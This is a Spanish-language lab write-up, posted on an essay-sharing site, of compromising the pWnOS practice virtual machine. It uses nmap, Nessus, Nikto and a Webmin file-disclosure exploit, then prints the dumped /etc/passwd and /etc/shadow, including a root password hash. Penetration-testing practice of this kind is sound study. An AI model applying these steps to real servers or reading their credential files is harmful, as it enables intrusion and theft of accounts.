ClubEnsayos.com - Ensayos de Calidad, Tareas y Monografias
Buscar

Hacking MV pnWsoS


Enviado por   •  5 de Septiembre de 2018  •  Práctica o problema  •  421 Palabras (2 Páginas)  •  114 Visitas

Página 1 de 2

Resolución MV PWNOS

Podemos encontrar la máquina en nuestra red con: nmap -sn

Una vez encontrada, ya la podemos escanear con nmap para ver qué puertos tiene abiertos:

[pic 1]

Llama la atención que podemos intentar entrar a través del navegador, sin embargo vamos a realizar un escaneo con Nessus para ver si podemos encontrar más puntos de entrada.

Tras probar con algunas vulnerabilidades, como la CVE-2008-0166, que permite realizar fuerza bruta por ssh. Intentándolo con root no se ha conseguido nada, así que pasamos Nikto. Con Nikto obtenemos información interesante, por ejemplo que podemos intentar un file inclusión.

No obstante, si nos fijamos, el puerto 10000 puede sernos de ayuda para entrar, así que vamos a buscar exploits para webmin. Obtenemos los siguientes:

[pic 2]

Tenemos varios: inclusión de ficheros, escalada de privilegios… nos fijamos que nuestra versión de webmin es la 0.01 y por tanto nos podrían servir aquellos que sirvan para esa versión, por ejemplo, 1997.php y 2017.pl. Elegimos la de perl, ya que la de php no funciona correctamente.

Efectivamente así es y podemos ver el fichero /etc/passwd:

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

mail:x:8:8:mail:/var/mail:/bin/sh

news:x:9:9:news:/var/spool/news:/bin/sh

uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh

proxy:x:13:13:proxy:/bin:/bin/sh

www-data:x:33:33:www-data:/var/www:/bin/sh

backup:x:34:34:backup:/var/backups:/bin/sh

list:x:38:38:Mailing List Manager:/var/list:/bin/sh

irc:x:39:39:ircd:/var/run/ircd:/bin/sh

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh

nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

dhcp:x:100:101::/nonexistent:/bin/false

syslog:x:101:102::/home/syslog:/bin/false

klog:x:102:103::/home/klog:/bin/false

mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false

sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin

vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash

obama:x:1001:1001::/home/obama:/bin/bash

osama:x:1002:1002::/home/osama:/bin/bash

yomama:x:1003:1003::/home/yomama:/bin/bash

y también el /etc/shadow

root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::

daemon:*:14040:0:99999:7:::

bin:*:14040:0:99999:7:::

sys:*:14040:0:99999:7:::

sync:*:14040:0:99999:7:::

games:*:14040:0:99999:7:::

man:*:14040:0:99999:7:::

lp:*:14040:0:99999:7:::

mail:*:14040:0:99999:7:::

news:*:14040:0:99999:7:::

uucp:*:14040:0:99999:7:::

proxy:*:14040:0:99999:7:::

www-data:*:14040:0:99999:7:::

backup:*:14040:0:99999:7:::

list:*:14040:0:99999:7:::

irc:*:14040:0:99999:7:::

...

Descargar como (para miembros actualizados) txt (5 Kb) pdf (529 Kb) docx (339 Kb)
Leer 1 página más »
Disponible sólo en Clubensayos.com